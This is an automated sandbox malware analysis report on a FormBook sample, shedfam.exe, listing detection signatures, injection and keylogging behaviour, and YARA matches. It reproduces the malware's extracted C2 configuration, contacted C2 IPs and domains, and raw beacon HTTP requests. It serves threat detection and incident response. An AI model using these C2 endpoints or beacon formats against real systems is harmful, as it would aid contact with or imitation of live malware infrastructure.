Windows Analysis Report
shedfam.exe

Overview

General Information

Sample Name: shedfam.exe
Analysis ID: 756041
MD5: c0a85d86855b257b25572aa7d9d90381
SHA1: ea5ce824d225c0df297586a2c6621aea5ab8584b
SHA256: c9cf9f0fa6980019aa3a93b9b25ca2cf14cfad4b4afef12d43a20ece34d2093b
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality to simulate keystroke presses
OS version to string mapping found (often used in BOTs)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Found evasive API chain (may stop execution after accessing registry keys)
Contains functionality to simulate mouse events
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

AV Detection
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.kmhbvf.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.kmhbvf.exe.3b00000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.kmhbvf.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.justbeand.com/sk19/"], "decoy": ["21diasdegratitud.com", "kx1993.com", "chasergt.com", "837news.com", "naturagent.co.uk", "gatorinsurtech.com", "iyaboolashilesblog.africa", "jamtanganmurah.online", "gguminsa.com", "lilliesdrop.com", "lenvera.com", "link48.co.uk", "azinos777.fun", "lgcdct.cfd", "bg-gobtc.com", "livecarrer.uk", "cbq4u.com", "imalreadygone.com", "wabeng.africa", "jxmheiyouyuetot.tokyo", "atrikvde.xyz", "ceopxb.com", "autovincert.com", "18traversplace.com", "internetmedianews.com", "entersight.net", "guzmanshandymanservicesllc.com", "gqqwdz.com", "emeraldpathjewelery.com", "flowmoneycode.online", "gaziantepmedicalpointanket.com", "111lll.xyz", "irkwood138.site", "abovegross.com", "shopabeee.co.uk", "greenvalleyfoodusa.com", "dd-canada.com", "libertysminings.com", "baronsaccommodation.co.uk", "kareto.buzz", "freeexercisecoalition.com", "73129.vip", "avanteventexperiences.com", "comercialdiabens.fun", "nondescript.uk", "facal.dev", "detox-71934.com", "kovar.club", "jetsparking.com", "infocuspublicidad.com", "xxhcom.com", "indianvoltage.com", "becrownedllc.com", "3744palosverdes.com", "gospelnative.africa", "linkmastermind.com", "cotgfp.com", "lousweigman.com", "cantoaffine.online", "debbiepatrickdesigns.com", "766626.com", "webcubemedia.africa", "autonomaat.com", "hannahmarsh.co.uk"]}
Uses 32bit PE files
Source: shedfam.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: netstat.pdbGCTL source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netstat.pdb source: kmhbvf.exe, 00000002.00000003.355015355.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.361850298.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362477372.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362621598.00000000010E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: kmhbvf.exe, 00000001.00000003.252395367.0000000004060000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000003.250969240.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.255494479.0000000001376000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000003.253039833.00000000011DA000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.364247640.000000000162F000.00000040.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000002.00000002.362902921.0000000001510000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.363419936.000000000060B000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000003.357565507.000000000034F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F34005
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3C2FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3494A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00F3494A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00F3CD9F
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3CD14 FindFirstFileW,FindClose, 1_2_00F3CD14
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F5D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00F3F735
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_00F3FA36
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_00F33CE2
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 4x nop then pop esi 2_2_004172FF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 4x nop then pop esi 2_2_004172B6

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 18.167.242.213 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.100.63.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe Domain query: www.73129.vip
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.111lll.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.justbeand.com/sk19/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: YISUCLOUDLTD-AS-APYISUCLOUDLTDHK YISUCLOUDLTD-AS-APYISUCLOUDLTDHK
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: NETSTAT.EXE, 0000000D.00000002.518369394.0000000003D9F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://gcsahrz23.xyz/
Source: shedfam.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: shedfam.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.252060134.0000000000F99000.00000002.00000001.01000000.00000004.sdmp, explorer.exe, 00000003.00000000.294072289.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.305847313.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.257903286.0000000001425000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.333339547.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.280708898.000000000F276000.00000004.00000001.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: kmhbvf.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: shedfam.exe, 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmp, shedfam.exe, 00000000.00000002.258467023.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.518230648.0000000003973000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 0000000D.00000002.514831802.00000000006C4000.00000004.00000800.00020000.00000000.sdmp, nse13E9.tmp.0.dr, kmhbvf.exe.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown DNS traffic detected: queries for: www.111lll.xyz
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 1_2_00F429BA
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy HTTP/1.1Host: www.111lll.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy HTTP/1.1Host: www.73129.vipConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 14:13:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: Cheertech CDNX-Cache-Status: MISSData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 1_2_00F30508
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405125
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 1_2_00F44632
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_00F5D164
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 2_2_00F5D164

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
